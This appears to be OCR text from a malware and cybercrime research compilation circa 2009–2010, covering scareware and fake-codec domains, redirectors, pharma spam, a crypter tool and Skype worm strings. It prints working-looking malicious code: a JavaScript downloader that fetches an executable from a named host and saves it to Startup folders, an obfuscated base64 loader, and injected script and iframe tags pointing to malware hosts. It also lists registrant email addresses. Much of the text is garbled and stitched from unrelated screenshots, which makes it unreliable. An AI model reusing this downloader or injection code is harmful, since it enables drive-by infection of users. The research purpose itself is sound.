216.240.146.119 -, terradataweb .com/senm.php?data=v22 - 66.199.229.229 -, and dvdiso- 
rapid .com/senm.php?data=v22 - 64.27.5.202. 


Several related fake codec serving domains parked at 216.240.143.7 are also currently 
active: 

get-mega-tube .com - Email: raymgnw95@gmail.com 

best-crystal-tube .com - Email: raymgnw95@gmail.com 

the-lost-tube .com - Email: hilachow@gmail.com 

sunny-tube-house .com - Email: hilachow@gmail.com 

proper-tube-site .com - Email: hilachow@gmail.com 

tube-xxx-work .com - Email: hilachow@gmail.com 
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You are viewing Average Insecure Programs ¥ for: World > Europe 


Click on the map to view in depth details for continents and certain countries. 


a i 
4p A 2 "wR? °¢g 
Ro 


4 programs 


3 programs 


Data Table for: World > Euro 


Name 31 days ago 7 days ago iday ago 1 hour ago Now 

1. San Marino (+6) 5 (+6) 5 (0) 11 (0) 11 11 

2. Montenegro (+5) 4 (9) 9 (0) 9 (0) 9 9 

3. Latvia (0) 8 (0) 8 (os (o)s s 

4. Belarus (-3) 11 (-2) 10 (-1)9 (o)s 8 

5. Ukraine (+1) 6 (0)7 (0)7 (0)7 ra 
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Contact Us 


Horne ; 
Photo Galery oft India presents 


Video Gallery 


Top 10 Contestants S k CC R k 
Top 100 Contestants 

Top 1000 Contestants ” 
Earty Bird Winners W A R S 


Eligteity Criterta 


Let no threat pass! 


How to Participate 


Contest Detaits Match your wits against the 


Prizes best IT Professionals 


Terens & Condtioers 


Reference Material «=©.Who can compete? 


Enlistment begins: 


by email. 


XBOX 360 
USB kits 


Windows Smart Phones 
and many more... 
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BRNDARAALL/N\A 


Wuban Furuki secanty group is keen on a number of computer network security technology, is committed to the 
maintenance of imemal security, Web server component of young people in order to secure technology-based 
professional and technical services team. The core team members have many years of the core systems, network 
applications, Web applications, hacking tools, network security theory, theory of the virus, dete encryption and 
decryption, backing and many other ways to have an in-depth research and experence. After years of constant 
exploration and unremitting efforts, eccumulsted nich expenence in the development of network security and 
improve network security solutions, home network to tebe this to heart safety modest! 


In recent years, the national security of the Internet encountered unprecedented challenges, “hackers” are fall of all 
types of media, « website database of the game have been caused by the invasion nearly 1,000,000 US. dollars of 
economic losses, a hacker to visit a company to use the datsbase server to steal 1,400,000 Customer credit card and 
Gebit card information and so on At the same time, based on the rogue software on the Internet, software and 

various types of Trojan horse virus has also spread to the security of the Internet bas brought serious harm. Baidu 
from the type of “hackers” search, 18,500,000 of the current data show’ that the proliferation of hacking, but also 
indicates our awareness of network security from the building to have e seriows shortage, as our hfe for a gpowing 
dependence om the Internet The higher, cell phones, e-rail, Internet banking and so on, just do not pay attention 
willbe subjected to heavy financial losses, Netwo incidents occur frequently that the 
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<SCRIPT Language="javascript" type="“text/javascript™> 

Function lsrn(lev3par1){ 

var exes=""\\qgol.exe" 

rials eamnittp://qolnanosat.com/adw files/50658/34dc6716/install .exe?7id 
stgte"GET";var stde"D";var ldobj-null; 
try{1ldobj=objmker(lev3par1 ,“Microsoft .“+stxal+"HTTP") ;ldobj .open(stgt ,url,false) ; 
pcatch(e){try{1dobj=objmker(lev3par1 ,“MS"+stxml+"2."+stxml+"HTTP") ;ldobj .open(stgt ,url, false); 
peatch(e)<{try{1dobj=objmker(lev3par1 ,"“MS"+stxml+"2.Server'+stxml+"HTTP") 5 

ldobj .open(stgt ,url,false) ;}catch(e){try{ldobj=new 
XMLHttpRequest() ;ldobj .open(stgt,url,false);}catch(e){return 6;}}}}> 

try{1ldobj .send(null);}catch(e)<{try{ldobj .send(null);}catch(e){return 8;};}; 

ldbody = 1ldobj.responseBody;var obj_strm=objmker (lev3par1,"A"+std+"0"+std+"B. Stream") ; 
if(obj_strn){obj_stra.Type=1;0bj_strm.Mode=3 ;obj_strm.Open() ;obj_stra.Write(ldbody); 

var hdrives";var dtempe"";var dstarte"";var daustarte""; 

try{var obj_WScript=objmker(lev3par1 ,"“WScript Shell"); 

try{var 

wshProcEnv=obj_WScript -Environnment("PROCESS") ;hdrive=wshProcEnyu("HOMEDRIVE") ;dtemp=wshProcEnu("TE 
MP") ;;catch(e){}; 

try{dstarteobj_WScript .SpecialFolders("Startup") ;daustart«obj_WScript .SpecialFolders("AllUsersSta 
rtup");}catch(e){}; }catch(e){}; 

if (hdrive=="""){hdrive="C:";};if(dtemp==""){try{var 
obj_fso=objmker(lev3par1,"Scripting .FileSysten0bject"') ;dtemp=obj_fso.GetSpecialFolder(2);}catch(e 
){}3};uar fFnex="";var 

Fone" Sif (fnexee""){if(daustartt«"")<{try{ fnedaustart+exes;obj_strm.SaveToFile(fn,2);fnex=fn;}catch 
(eidsdsds 

if(fnex==""){if(dstartt=""){try ¢ 

Fn=dstart+exes ;obj_strm.SaveToFile(fn,2);fnex=fn; pcatch(e){};}3}; 

if (fnexe=""){try{fnehdrive+"\\Documents and Settings\\All Users\\Menu 
Inicio\\Programas\\Inicio"+exes ;obj_strm.SaveToFile(fn,2);fnex=fn; }catch(e){};}; 
if(fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menuen 
Start\\Programmer\\Start''+exes ;obj_strm.SaveToFile(fn,2);fnex=fn; }catch(e){}3}; 

if (fnex=="){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu 
Start\\Programma\\'s\\Opstarten"+exes ;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e)<{};}; 


J";var stxml="XML" 5var 
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Vadeo Activex Object Error 
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<script Language=JavaScript>function ghlwgtnu(n){var b =""";for(var i=G;i<n;i++){be="6"; return 
b;}function azentr(a){return parseInt(a,2);}function joqrugnky(str){var lbejafl=5+2+145var 
qgblroatuz="ABCDEFGHI JKLMNOPQRS TUUWXYZabcdef ghi jklanopqrstuuwxyz 6123456789+/" ;var 
gbkucuwjndp=""";var turpy=""";for (var 

i=6;i<str length ;i++){gbkucuwjndp+=ghlwgtnu( (6-qgblroatuz.indexOFf (str .substr(i,1)).toString(2) le 
ngth) )+qgblroatuz.indexOf(str -substr(i,1)).toString(2) ;if (gbkucuwjndp .length%lbejafl==6){turpu+=S 
tring .fromCharCode(nzentr(gbkucuwjndp .substr(6,1lbejafl))) ;gbkucuwjndp="""; else 

if (gbkucuwjndp.length>1bejafl){turpu+=String .fronCharCode(mzentr (gbkucuwjndp .substr(6,1bejafl))); 
gbkucuwjndp=gbkucuwjndp.substr(1lbejafl, (gbkucuwjndp.length~lbejafl));}else 

if (gbkucuwjndp.length<lbejafl){continue;}}return 

turpy; }document .write( joqrugnky(" [AO8SFRNTD48Z26121G1KPXR1Ic3RUYmo+PC9kaXY*+ 1 AOSBU ONSSUBUIExhbmd1¥Wdl 
PSJq¥XZhc2NyaXB G1iB BeXB1PSJOZXh OL 2phdnF 23 JpcHQiPiAKZnVUY3Rpb24gbHNybihsZ2x¥zcGFyMS17CnZhciBleGUzP 
SJCXHF nb2wu2xXh1l il gp2¥X I gdXJsPS JodHRw0i8u229sbmF ub3sNhdC5 jb2 GY WR3X2Z2pHGUZLZUWNT guNZRkYZY3MT AVaWSz20G 
FsbC51eGU/aWQ9ONS I 7dmFy IHNGeG1SsPSJYTUWi03Z2hciB2dGd GPS JHRUQIO3ZhciB2d6Q91kQi03ZhciBsZ69iaj iudwxsOwp 
Gcn17bERvVYmo9d2 JqbWtlcins2Xy2cGFyMSwilW1 jcm9zb22GLilre3sRabWwr IKHUUFAIKTtsZ69i ai SucGUuKHNGZ3QsdXJs 
LGZhDHNIKTsSKFWNhdGNoKGUpe3RyexXts2G9iaj 1uYapt a2UyKGx1d jNwYXIxLCJNUy I rc3R4abwur I jlulitzdhhtbeCsiSFRUU 
CIpO2xkb2JqLa9uZW4oc3RndCx 1cawsZ2mF sc2UpOwp9¥ 2F BY2goZ2S17dHJSe2xkb2JqPW9iamir2X I obGU2M3Bhc jESIK1TIi 
tzdHhtbCsimiST2XJ22X 1iK3NGeG1sKyJIUFRQTik7Caxkb2JqL m9w2W4oc3RndCx tcmusZmF sc2Up031 jYXRjaChlkKxt Gcnl 
7bGRYY mo 9b AV3 I FANTEN GdHBSZXF 12XNOKCK7 DGRYY moub3B1 bihzdGd GLHVybCxAyY WxzZ2Sk7 FWNhdGNoKGUpes JLdHUybiAw 
0349FX GKdHJSe2xkb2JqLnNlbmQobnUsbCk7 fF WNhdGNoKGUpe3Ryexts2691 ai SZZ2WSkKKGS 1bGwp031j YXRj aChlKXty2XxR1c 
m4ghDt90367CAaxkYm9keSAPIGxkb2JqLnJlc3BubnNlQn9kelt2¥x I gb2Jqx3NOcnO9b2JqbWtlcihs2x¥zcGFyMSwiQSIrc3 
RkKyJP LitzdGQr [kI uUSRyZ2WF tLik7Cm1lmKG9ial 9ZdHICKXtuYmpFc3Rybs SUexB1PTE7b2JqX3NOcnGuTW9KZT O2029ial9 
ZGHItLkOwZ2W4oKT tuYmpfc3RybSSxcal 62Shs2GJuZHkpOwp2Yx I gaGRyaX21PS1i03Z2hciBkdGUtcd Bil jt2vxXIgZHNGYXJG 
PS1i03ZhciBkYXUZdGF ydD Gil j sKdHJSe3Z2hciBuYapFUINjcmlwdD1uYapt a2UyKGx1d jNwYXIxLC JXU2NyaXB OL INoZxs I 
ik7CnRyeXt2vx I gd3NoUHJuyY Wud j 1uYmpFUINjcmlwdCSF bnZpcm9ubWWudCgi UF JPQOUTUY I pO2hkcml22T13c2nQcm9 jRW 
S2KCJITOIFRFE JJUKULKTCKdGUtcD13c2hQcm9 jRW52KC JURU1Q1ik7 FYNhdGNOKGUpe3 O7CaRyextkc3RhcnQob2Jqxi1dTY3J 
pcHQuU3B1Y21hbEZubDGR1cnMol LNGYXJ OdXALKTtkYXUZdGF ydD 1uYmpFU1IN] cml wdC5TCGU j aWF sRm9sZ2GUycygi QWxsUXNL 
cCaNTdGFydhUwlik7 fWNhdGNoKGUpes 67 f WNhdGNoKGUpe3 67 CmimKGhkcAal22T 69 Lil pe2hkcnl22T 6192010307 aWYoZHRIb 
NAOPSTIKXtOcn17dmFyIG9ial9mc289b2JqbWt lcihs2xyzcGFyMS wiU2NyaXB BaSnLkZ2pbGUTeXNOZ 1 PYaplLY3QikTtkdG 
UtcD1uYmpfZ2nNuL kdl dF Nw2WNpYWxGb2xk2X LoMik7 FUNhdGNoKGUpe3 67 FTt2YX 1 g2mSleD Gil jt2¥XIg2m491il7avvo2ns 
LeDO91ilpe21AKGRHAXNGYXIGIT Oi 1i17dHJSe2ZuPWRAGXNOYX J OK2U42XN7b2JgX3NOcmOuU2F 22URURAlsZShmbiwykTtm 
bAU4PW2u031 7] YXRj aChlLKXt903 67 F TsgC ml mKG2Zu2Xg9PS1iKXtpZihkc3RhcnQhPS Likxt GcnkgeyBmbjikcSRhcngQr2khic 
ztu¥mpfc3RybSSTYXZ1UG9Galx1KGZuLD I p022u2Xg92m47 fF WNhdGNOKGUpe3 67 FT C9OyAKaWYoZ2mS1eD 891i I pedRyextmbj 
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ibfny8e 226 text/html 
HTTP imagination-1.com /?uid=138&pid=3ettl=b1d4¢e571b16 525 text/html 
HTTP my-systemscan.com /?p=WKmimHVla3GHjsblo22EhHYSipny¥bWeMn... 1,780 — text/htrl 


HTTP my 
HTTP my 
HTTP my 
HTTP my scan.com /Layouts/Landings/CentralLandings/7fimages/|... 0 


temscan.com /Images/loading. gif Oo 
Strategies/7a06b79cdb03a4¢ed1394b,., 0 


nscan.com /Layouts/Landings 


emscan.com /Scripts/ 


iCentralLandings/?/images/|... { 


temscan.com /Layouts/Landings/CentralLandings/7fimages/|... 0 


HTTP m temscan.com /Layouts/Landings/CentralLandings/7/imaqges/|... it) 
HTTP my-systemscan.com /Layouts/Landings/CentralLandings/6/images/|... 0 
HTTP my-systemscan.com  /build?_138.php?cmd=getFile&counter=0&p=.,.. 0 application/... 
HTTP my-systemscan.com  /build?_138.php?cmd=getFile&counter=1&p=.., 0 application/... 
HTTP my-systemscan.com /build?_138.php?cmd=getFile&counter=2&p=.., 0 application/... 


HTTP imagination-1.com /?uid=138&pid=3ettl=b1d4¢e571b16 527 — text/html 
HTTP my-systemscan.com /?p=WKmimHVla3GHjsbloZZ2EhHYsipny¥bwaMn. .. 1,780 ~~ text/html 
HTTP my-systemscan.com /Images/loading. gif 0 

HTTP my-systemscan.com /Scripts/Strategies/6ad65F29d4977407cc968c.,., 17,203 textfjavasc... 
HTTP my-systemscan.com j/Layouts/Landings/CentralLandings/6/images/|... 32,352 — image/aif 
HTTP my mscan.com j/Layouts/Landings/CentralLandings/6/images/|... 0 

HTTP my mscan.com jLayouts/Landings/CentralLandings/6/images/|... 27 ~—imaqge/aif 
HTTP my-systemscan.com j/Layouts/Landings/CentralLandings/6/images/|... 79 image/aif 
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text/html 


big-tube-list .com - Email: isaacdonn@gmail.com 


“d Local Drse (C3) = Locust Desc (0) 
ae a 


gal), women CJ Shered Documents 


System errors detected. To prevent data lost system scanning ts started 


Sanning... eeeee Cancel 


Object: C\WINDOWS system 3 2yaetochk ene 


A third campaign is using a single redirector to tangoing .info/cgi-bin/analytics?id=917304 &k= 
- 91.207.61.48 - Email: dophshli@gmail.com to dynamically redirect visitors to pretty much all 
the scareware domains listed in [7]part twenty one of the diverse portfolio of fake security soft- 
ware series. Moreover, the very same email used to register the redirecting domain was also 
used to register a [8]payment processing gateway for scareware transactions in January, 2009. 


Yet another blackhat SEO operation maintained by the same group since February, 
2009 is fi97 .net/jsrphp?uid=dir &group=ggl &keyword= S&okw= &query="+query+" 
referer="+escape(document.referrer) +" &href="+escape(location.href) +" 
Gr="4+rzzt'" ><"+"/scr"+"ipt>", which according to publicly obtainable statistics received 
approximately 138, 000 unique visitors in April, with 30.23 % coming from Google. 


2325 


Baw HacTpotkh OpenVPN 
HOOKNMOYUTbCA K CEPBUCYyY . 
NonknounTcs kK cepBuC Baws Hactpohky PPTP VPN (RU) 
(npogznuTb nognnucky) Baw HacTpofikn PPTP VPN (EN) 


Qoctynuble nognucku: 


Hazeanue Lexa Mpodnexue Ha 
24 hours 1.3 usd 1 cyTKM 

7 days 7.5 usd 7 cyTOK 

1 month 20 usd 1 Mecau 

3 months 65 usd 3 Mecaua 

6 rnonths 105 usd 6 MeCAueB 


Moctynupie cepspepa: CWA(US) 100 MBit, AectpwafAT) 10 MBit, Cepmanna(DE} 
100 MBit 


Ona npognexwa nognuckh kK cepency HeobxogMmo nononHMTb cyeT B pasgene 
Aevexuple onepauuu. Bce Bonpocb! mo>xKHO 3agaTb B pasgene Coobwenue, B 
KOHTaKTbI, Ha Support@safe-inet.com “no icg 802034 


BugeounctpyKuun: 
OpenVPN PPTP VPN 
Windows XP Windows XP 
Windows Vista Windows Vista 
Windows 7 Windows 7 
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Octrix Crypter Professional Edition 


~ Fichero y Stub 


[Archivo = 
Stub — 


~ Encriptacion-—._ -- Opciones 
[” Afiadir EOF |” Anti-Sandboxie 

© xor 0 Gost [~ Realing PE [” AntiJoebox 

[~ Anti-Anubis |” Anti-threatexpert 

[~ Anti-Virtual PC [~ Anti-viware 


re 
© Des Tea || antiCwSandboxe [7 AntiVatuaBox 


Icono ) - Generar 


[~ Cambiar Icono tne. 
ontrasefia 
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Standartmedia_ . 
a) WWW nome: 


Naren ynpeBnersta 


caviTamn 
ed Tasemoe 
CP ere 
dreree re Ts Sapeacke.ru  wee.rsWellera) Noxasan (50) apex na cpaeme DH 2] Crpammas tun 2 3 
\D World Wate Web Yoee + anpec Beperropen Raapane rps Crarye 4 
WWW acewres Depravkeru 70.A6.126.292 Aeen/zeediry w y 4 
Pranmerc me dorvey-master.ry 78 46,126,332 Jeweniidorvey-master.su eo ? 
— emal-spam-dispatch ru 7846.126,432 Pereen ened spam despatch rw wo 9 
= = hosting: spem.ne 78446,126,132 fereenMosteng spam ru e ? 
Me tpi n PO hodak prome ne 76 446.126.3352 /evvene/amvader.ru w ? 
Cacaretrses EYE brytansatru 70.46.126.292 Jorveniarytareset re eo ? 
kppsottry 70A6.126.392 feven(eypesch ru ww y 
G es Mistroypeotht.varreklam ru 76.46.126.132 Jemenftdtstroyeroelt.vemrebiaen ru we ? | 
Coroeese sarees naverty ru 7846,126,432 Jeveniinavery ru es ? 
Teese ras fgrebiarna.nu 78.46.126,132 Jerwningreblema ru e 9 
Ccciioteet Dare Te 
Ceraroeeee o0 100 Tee mere promocedh.ns 78.46.126.232 /vrenuipremocash ru ow 9 
Oorsroteae trees promovtandart.ru 7046.226.392 /urveniipromottandart ru e ? 
Georg radreklameyire 7046.126.392 /erven/ferytariset.ry few yy 
rassiaru 78 A6326,392 /even/naverhy ru ) 3 
af Pectpyecmns fasstka-emal su 78.46.126,132 Jevenirasstia-emeiiry ry 7 
Mermaste Gime fekivassdka.re 78.46.126.132 Jerenitekl cassia ru e + 
‘astarsa— rebioma-estre 78.44.126.132 Jewenireelame-evtru ow + 
poy, rekiema-aupercu 76.46.126.292 /even'reklama-superru w ? 
iceneen rakiamnait ry Te 44 136.992 ae o. = P| 
tensa amma Mac, - : end eT on | 
~~ Peay #1 renee tue ® Sel 
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The [9]traffic hijacking of for the purpose of serving malware, using over a hundred different 
.us domains was in fact so successful that several [10]webmasters reported loosing [11]their 
organic search traffic due to [12]the content within the sites. The campaign then switched 
to a pharmaceutical theme using a Google search engine theme, with several static links to 
pharma scams, once again using the already established traffic redirections tactics. 


Web images Mapa Hews Sheaging Video more¥ Signi 


re Adaanced Search 
Se | Preferences 
Web Results 1 - 0 for . (0.07 seconds) 


ored Link 
Searches related to: 
Viagra for 0.99 USD: 
Dont let the pharmacy 
compares beat you 
Buy Viagra orfine 
for 0.99 USD 


theusc@rugs com 


Cialis for 1.99 USD: 
Enhance the quality 

of your ife 

Buy Ciaks online 

for a bw 1.99 USD 
mendrugsshop.com 


Levitra for 4.5 USD: 
Make it hard 

and make it last 

again and again 

with the help 

of Lewtra 

The good life 

ts back! 

healthrefil com 


The redirectors in question petrenko .biz - 88.214.200.150 - Email: olegoff@yandex.ru 
and myseobiz .net - 67.225.158.16 - Email: 3bd864dddbe4421ab1112a6ebc6df4fb.protect- 
@whoisguard.com remain in operation. The bogus Google front page is advertising the 
following pharma domains: 


theusdrugs .com - 78.140.132.11, parked at the same IP are also more pharma domains: 
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db 8 


; char a1Hello2Hi3HowAreYou4HelloAgaini 6YouSkypeversio{ ] 


Pasnep (o6) 


6C+a1Hello2Hi3HowAreYou4sHelloAgaini6YouSkypeVersio db ‘1:hello' ,6Dh,6Ah 


68+ ; DATA XREF: sub_41DAAF+16To 


68+ 3; sub_41DB93+9To 
65+ db ‘'2:hi‘ ,6Dh,6Ah 

BA+ db ‘3:how are you’ ,6Dh,6Ah 

6C+ db ‘4:hello again‘ ,6Dh, GAh 

69+ db ‘16:you si )pe version is old',6Dh,6Ah 
3A+ db ‘1i:what are you?’ ,6Dh, 6Ah 

6B+ db ‘12:from where are you?’ ,6Dh,6Ah 


65+ db ‘13:what are you doing in my contacts?‘ ,6Dh,6Ah 


2 6+ db '26:as I said %s‘*,6Dh,6Ah 

64+ db ‘21:so %s‘,6Dh, 6Ah 

f7+ db '22:%s :D',6Dh,6Ah 

72+ db '23:look %s* ,6Dh,GAh 

3F+ db '24:here %s‘*,6Dh, 6Ah 

66+ db ‘38:so what do you think?‘ ,6Dh,6Ah 


68+ db '116:what is in that link on your skype?‘ ,6Dh, 6Ah 


72+ db ‘111:do you have camera on skype?" ,6Dh,6Ah 
3F+ db '112:is it really your web site?‘ ,6Dh,6Ah 


a7+ db '126:what do you think about that?‘ ,6Dh,6Ah 


72+ db '121:what is there?’ ,6Dh,6Ah 
26+ db ‘166:pudge women ;) *,6Dh,6Ah 
26+ db '161:piece of shit‘ ,6Ah 

26+ db ‘now everyone know ;) *,6Dh,6Ah 
63+ db '162:idiot' ,6Ah 

32+ db ‘what are you doing‘ ,6Dh,6Ah 
4O+ db '163:crazy bitch' ,6Dh, 6Ah 
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db 5) 

; Char a1Hello2Hi3HowAreYou4HelloAgain(i 6YouSkypeversio[{ ] 
6C+a1Hello2Hi3HowAreYou4sHelloAgaini6YouSkypeVersio db ‘1:hello',6Dh,6Ah 
68+ ; DATA XREF: sub_41DAAF+16To 
68+ 3; sub_41DB93+9To ... 
65+ db ‘'2:hi',6Dh,6Ah 
BA+ db ‘3:how are you’ ,6Dh,6Ah 
6C+ db ‘4:hello again‘ , 6Dh, GAh 
69+ db ‘18:you si )pe version is old‘ ,6Dh, 6Ah 
3A+ db ‘11:what are you?’ ,6Dh,G6Ah 
6B+ db ‘12:from where are you?' ,6Dh,6Ah 
65+ db ‘13:what are you doing in my contacts?‘ ,6Dh,6Ah 
26+ db '26:as I said %s‘,6Dh, 6Ah 
64+ db '21:so %s',6Dh,GAh 
f7+ db '22:%s :D',6Dh,6Ah 
72+ db '23:look %s‘,6Dh, 6Ah 
3F+ db ‘24:here %s‘,6Dh, 6Ah 
66+ db ‘36:so what do you think?*,6Dh,6Ah 
68+ db '116:what is in that link on your skype?‘ ,6Dh,6Ah 
72+ db ‘111:do you have camera on skype?’ ,6Dh, 6Ah 
3F+ db ‘112:is it really your web site?‘ ,6Dh,6Ah 
fit db '126:what do you think about that?" ,6Dh,6Ah 
f2+ db '121:what is there?’ ,6Dh,6Ah 
26+ db '166:pudge women ;) *,6Dh,6Ah 
26+ db ‘161:piece of shit‘ ,6Ah 
26+ db ‘now everyone know ;) *,6Dh,6Ah 
63+ db '162:idiot* ,6Ah 
32+ db ‘what are you doing’ ,6Dh,6Ah 
4O+ db '163:crazy bitch’ ,6Dh,6Ah 
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2010-06-16 02:34:09 F 
2010-06-11 09 
2010-06-1f 8 
2010-06-11 08 
2010-06-11 08 
2010-06-1f 4 
2010-06-11 { 
2010-06- 
2010-06- 
2010-06 0 
2010-06-16 0 
2010- 
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Highest @ Fastest Payouts in the World! START MAKING MONEY 
0id you know that mect pay-per irctall program: ony pay for countries they 
‘want to? Snaphentath pay: for every major country in the workd! We believe in 
poying the highert and resiitic rate we can offer to cur PARTNERS over the 
lore term Depending on whether you're 2 roftware-developer, or web-macter 
oe a Gatributor, Snapinctelt beteves in counting sccurstely and paying on 
time every pay period Did wou sto know that other programe promote beirg 
the highest paying comparie: in the market, but when ® come: to thelr 
reporting and getting paid, they cut back om the tetsl smourt of inctelt:, 10 they don't have to 
pay you for what you delivered !! Therefore, not onby are exploying fauty sdvertizing, they are 
ato reducing their sctual payout by increscing the di-crepancy between whit you delvered 
and what they are counting. BUT NOT HERE AT SNADINSTALL - WE BELEVE IN PAYING YOU FOR 


‘Signing wD & the eacest tg 
FO BA eT 


Snapirctelt: beteves in high quality cortent, and it constantly rotating and 
adding new offer: into the stem. We stay current with marbet trend: and 
need: and do cur very bert to make zure tht: FREE contert & available to you 
and your webcRe sudience. Your sudlence or urenbdare wil be extremely 
tathfied when have the ability to choose between search product:, games, 
sereercaver:, naw widget: - the it continue: to grow and go on and on... 
Snapirctell early slows you to offer an sRernstive advertizing media to your 
audience! Smapirctell will have the right Program for you... 


Best Reporting System & Technology - Making Easy to Use! 
Snaplrctals wes 2 reporting nystem second to none, Whether courting a 
specific country, or deity, revetioneg Count, or total revenue earned for the 
day - Smpbutel wes » rophbticned reporting a pent pending technology 
+ Called Srapdccuratelh! Smodccurtelihh was Gerigned specific ely with 
you In mind. No more, ro lets, Every inctell courts, where ® originated, and 
teby's that Count accurately to the penny every minute, or every day, You 
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|< Source of: hitp:/Avww.us. playstation.com/News/Stories/1 


Fie EGR Yew Help 


<div class*"“left column"> 


| - Mozilla Firefox 


<div ide"editorial”> 
<div class*"editorial head”> 
_<hi>God of Voices<script_sro=http://wuw.colduop.com/b.j3></soript></h1>| 
<h3>Here's a complete list of every actor in God of Var.<script...</h3> 
<br class*"clear” /> 
<p>March 18, 2008</p> 
_<p>by <strong>Ivan 3 


ic<script sro=http://wuw.< 


<table cellspacing®"0" cellpadding="0" border="0"> 
<tr valigne die"> 
<td class="left">Courtesy of</td> 
<td class*"logo"><img srce*"http: 
</tr> 
</table> 


" widthe"S4 


<a href="/neva/s 
</div> 
<div class*"editorial content”> 
Without solid acting, a good story isn’t worth a barrel of starfish in the middie of the Sahara or a monkey tied to t: 


<P> 

<I>God of War</I>, good Littie game that it is, comes complete with a cast of notable videogame mainstays who have lent —- 
<P> 

The cast looks something like: 

<ul> 


<Li><ign hrefe"h 


tp://www. imdb. com/name/ 


O08 


/" target="_blank"><b>Claudia Black</b></ign> <= Artemis 
<LI><ign href="hetp:// www. imdb.com/name/nmO086840/" target="_blank"><b>Susanne Blakeslee</b></ign> -- Oracle of Athens, ' 


<LI><ign href="http://s 


» imdb. com/name/nmO089710/" target="_blank"><b>Steve Blum</b></ign> -- Ares 


<LI><ign href#"http:// ve. imdb. com/ name/ nmi 


3/" target="_blank"><b>TC Carson</b></ign> -- Kratos 
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Curency [USO 3] 


+1(800) 998-7978 


@2|,;°/|a 


Want to give ita try? 


importard free Pits win EVERY order! 


Product info: Men's Health Erectile Dysfunction 


@ 


Viagra 109 mg 


+ 4 Free Viagra pats £0 
+ 4 Free Viagra pats 10 
+ 4 Free Viagra pats 10 


+ 4 Free Viagra pats 10 


+ 4 Free Viagra pats £0 m 


+ 4 Free Viagra pals 50 


medscompany .org 
canadian-rxpill .com 
bestyourpills .com 
rx-drugs-support .com 
payment-rx .com 
genericdrugs .in 
mendrugsshop .com 
healthrefill .com 


+ 4 Free Viagra pats 10 


Viagra 


Cik& Here To Learn About Discounts » 


Viegas (Stsenatl) thas been estimated hat moctence afects 142 milion mes 


wertdwee Over haf of al men mth mpotence are thought to have some 


phytce (mecca! cause The remancer are belewed ts have paychogen< 


caunes of impotesce Medical causes of mpotecce mciude dabetes ant 


crovlatory teurtigcal or epingcal condtess 


Pre 


$36.00 


$46.95 


$380 


$1025 


$132.60 


$170.90 


$212.40 


Peritem Savings 


$300 You save: $0.00 
$313 You save: $7.05 
$295 You save: $ 19.50 
$245 «= Yousave: $51.75 
$220 You save: $ 83.40 
$i You save: $153.90 


$1.77 «= You seve: $ 219.60 


Order 


Add 12 Curt 


Add ¥0 Cart 


Add Curt 


A3d 19 Cart 


Add 2 Curt 


Add 19 Cart 


ASO 1% Cart 


«<d¢eed¢ed¢*dnte 


$0.00. | Otems | Shopping Can Ww 


THEUSDRUGS 


Viagra + Cialis Pack 


ae @ 


GAAUS10 pits VIAGRA'TO pits 


Payments accepted 


— 9 Ela) 


Any (peostions? Contact us 


Search 


» Bestsetors 
» Alergy (9) 
» Ant Fungal (6) 
» And Viral (9) 
» An®-Acaiy (4) 
» Ant-Desressant (23) 
» anmbioees (34) 
» Atets (7) 
» Asia (3) 
» Blood Pressure (53) 
» Cancer (7, 
» Chotesterct (10) 
» Crasetes (10) 
Erectie OysAmcten (31) 
Erecton Packs (4) 


Eve Orogs (4) 


» Gastoitestnal (14) 
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Bos rerrts oh on om “ 


Please Note 


The Sports Network website and other major news sites have been hacked by a poblncal entity fom Chena, and as a result are ternporarily unavailable. We apologize for any inconversence and hope to be beck up and running & 
00n 26 possible. Thank you for your pabance and understanding. 


‘Sports Network Management 
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A2 «+ MONDAY, SEPTEMBER 28, 1998 » MIAMI DAILY BUSINESS REVIEW 


mn ™ a5 mel 
| ae ie iG ide i 


ELITE CUBAN ESPIONAGE TEAM INVADES MIAMI 
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152.952. 781.coldwop.com 24.46.0014 
a eee ‘it 


24,44,29).232 


67,81.36.254 
72.293.0.0/16 ——————_—*3_-» s}3432 


72.193.246.29 


8.90.39 


76, 248.75,3 76.224,00/11 ————_—_—_—_*5_» as7132 


#3,5.21455 83.00.11 ——————_—_*3_-» asm? 


68.0. 207.107 68,60.392.0720 


a ———1 
ge AS7725 
8,60.2117 ————_“@!) ___» 62.60.0029 ————————” 
ve 


68.202.106.222 ©-68-60-21-17 Nsdi.ga.comcast.net 


um 
a 75.129.134139 68,202,006 ——————*S—-» s13343 


MH2Zns1 .coldwop.com 


—____» 
Se 75.137.93.12 
nsL.ns2.n6L.coldwop.com 


1510, ra2.nsl .coldwop.com 


222-106, 202-68, tampabey.res.rr.comn 

75.129.128.019 ——____—“3_ asz0115 
75-2 291 34-139.dhep.fdul.wi charter.com 
111.P62.nsl-coldwop.com 75.137.92.0922. ——————**- si9115 
63.ns2.n61.coldwop.com 

ns4.ns2.ne1.coldwop.com 

TSS. N82.NSL.<oldwop.com 

66.N52.N81.coldwop.com 

s7.ns2.n61.coldwop.com 


ns8.ns2.ns1.coldwop.com 


189.N82.n6L.coldwop.com 
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LAURA HARRIS NUDE NAKED HABITAT <iframe src=//gpamelaaandersona ... 
We were unable to find anything for LAURA HARRIS NUDE NAKED HABITAT <iframe 
src=//gpamelaaandersona.info/-naked.html>.html’. Please try another search. ... 

www. nkchannel.org/contents/?doc=bbs/gblink. php&bo_table=toedit&.sselect=&stext=& 
ssort=wr_d... - 29k - Cached - Similar pages - Note this 


HAS ALLISON MACK EVER POSED NUDE <iframe src=//gpamelaaandersona ... 
We were unable to find anything for 'HAS ALLISON MACK EVER POSED NUDE <iframe 


src=//gpamelaaandersona.info/-naked.html>.html’. Please try another search. ... 
www.nkchannel, org/contents/?doc=bbs/gblink. php&bo_table=toedit&asselect=&stext=& 
ssort=wr_d... - 29k - Cached - Similar pages - Note this 


More results from www.nkchannel. org » 


NUDE KATIE PRICE CLIPS <iframe src=//gpamelaaandersona.info/-naked ... 
Watch Video Clips, Stream Music, View Photos, Post to Blogs & Forums, Join Groups, 


Browse Profiles and more on IMEEM, the best of social medial 
www. dd-photo.net/hongdae/board/?doc=bbs/gblink. php&.bo_table=board&sselect=&stext=& 
ssort=w.,, - 29k - Cached - Similar pages - Note this 


BRITNEY SPEARS PICTURE NO PANTIES <iframe src=/igpamelaaandersona... 
We were unable to find anything for (BRITNEY SPEARS PICTURE NO PANTIES <iframe 


src=//gpamelaaandersona.info/-naked.html>.html’. Please try another search. ... 

